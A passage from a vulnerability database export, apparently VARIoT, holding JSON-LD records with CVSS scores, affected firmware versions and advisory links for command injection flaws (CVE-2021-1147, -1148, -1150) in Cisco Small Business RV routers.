          {
            "date": "2021-01-13T22:15:15.007000",
            "db": "NVD",
            "id": "CVE-2021-1148"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41152"
          },
          {
            "date": "2022-08-05T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374202"
          },
          {
            "date": "2021-09-29T07:32:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002740"
          },
          {
            "date": "2022-08-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1031"
          },
          {
            "date": "2024-11-21T05:43:41.677000",
            "db": "NVD",
            "id": "CVE-2021-1148"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1031"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Command injection vulnerability in router",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002740"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1031"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202101-0789

    Vulnerability from variot - Updated: 2024-11-23 21:51

    Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV A command injection vulnerability exists in the router.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202101-0789",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "application extension platform",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.55"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "cisco rv130w wireless-n multifunction vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv130 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "application extension platform",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv110w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w no",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41153"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002741"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1147"
          }
        ]
      },
      "cve": "CVE-2021-1147",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-1147",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CNVD-2021-41153",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "VHN-374201",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-1147",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2021-1147",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-1147",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2021-1147",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2021-1147",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-41153",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202101-1032",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-374201",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41153"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374201"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002741"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1032"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1147"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1147"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV A command injection vulnerability exists in the router.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-1147"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002741"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41153"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374201"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-1147",
            "trust": 3.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002741",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41153",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.0143",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1032",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-374201",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41153"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374201"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002741"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1032"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1147"
          }
        ]
      },
      "id": "VAR-202101-0789",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41153"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374201"
          }
        ],
        "trust": 1.3577208514285712
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41153"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:51:05.565000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-rv-command-inject-LBdQ2KRN",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-command-inject-LBdQ2KRN"
          },
          {
            "title": "Patch for Cisco RV110W/RV130/RV130W/RV215W command injection vulnerability (CNVD-2021-41153)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/272251"
          },
          {
            "title": "Multiple Cisco Product Command Injection Vulnerability Fixes",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=139531"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41153"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002741"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1032"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.1
          },
          {
            "problemtype": "CWE-20",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [NVD Evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-374201"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002741"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1147"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.9,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-command-inject-lbdq2krn"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1147"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.0143/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41153"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374201"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002741"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1032"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1147"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41153"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374201"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002741"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1032"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1147"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41153"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374201"
          },
          {
            "date": "2021-09-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002741"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1032"
          },
          {
            "date": "2021-01-13T22:15:14.943000",
            "db": "NVD",
            "id": "CVE-2021-1147"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41153"
          },
          {
            "date": "2022-08-05T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374201"
          },
          {
            "date": "2021-09-29T07:51:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002741"
          },
          {
            "date": "2022-08-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1032"
          },
          {
            "date": "2024-11-21T05:43:41.543000",
            "db": "NVD",
            "id": "CVE-2021-1147"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1032"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Command injection vulnerability in router",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002741"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1032"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202101-0792

    Vulnerability from variot - Updated: 2024-11-23 21:51

    Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV A command injection vulnerability exists in the router.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202101-0792",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "application extension platform",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.55"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "cisco rv130w wireless-n multifunction vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv130 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "application extension platform",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv110w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w no",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41150"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002712"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1150"
          }
        ]
      },
      "cve": "CVE-2021-1150",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-1150",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CNVD-2021-41150",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "VHN-374204",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
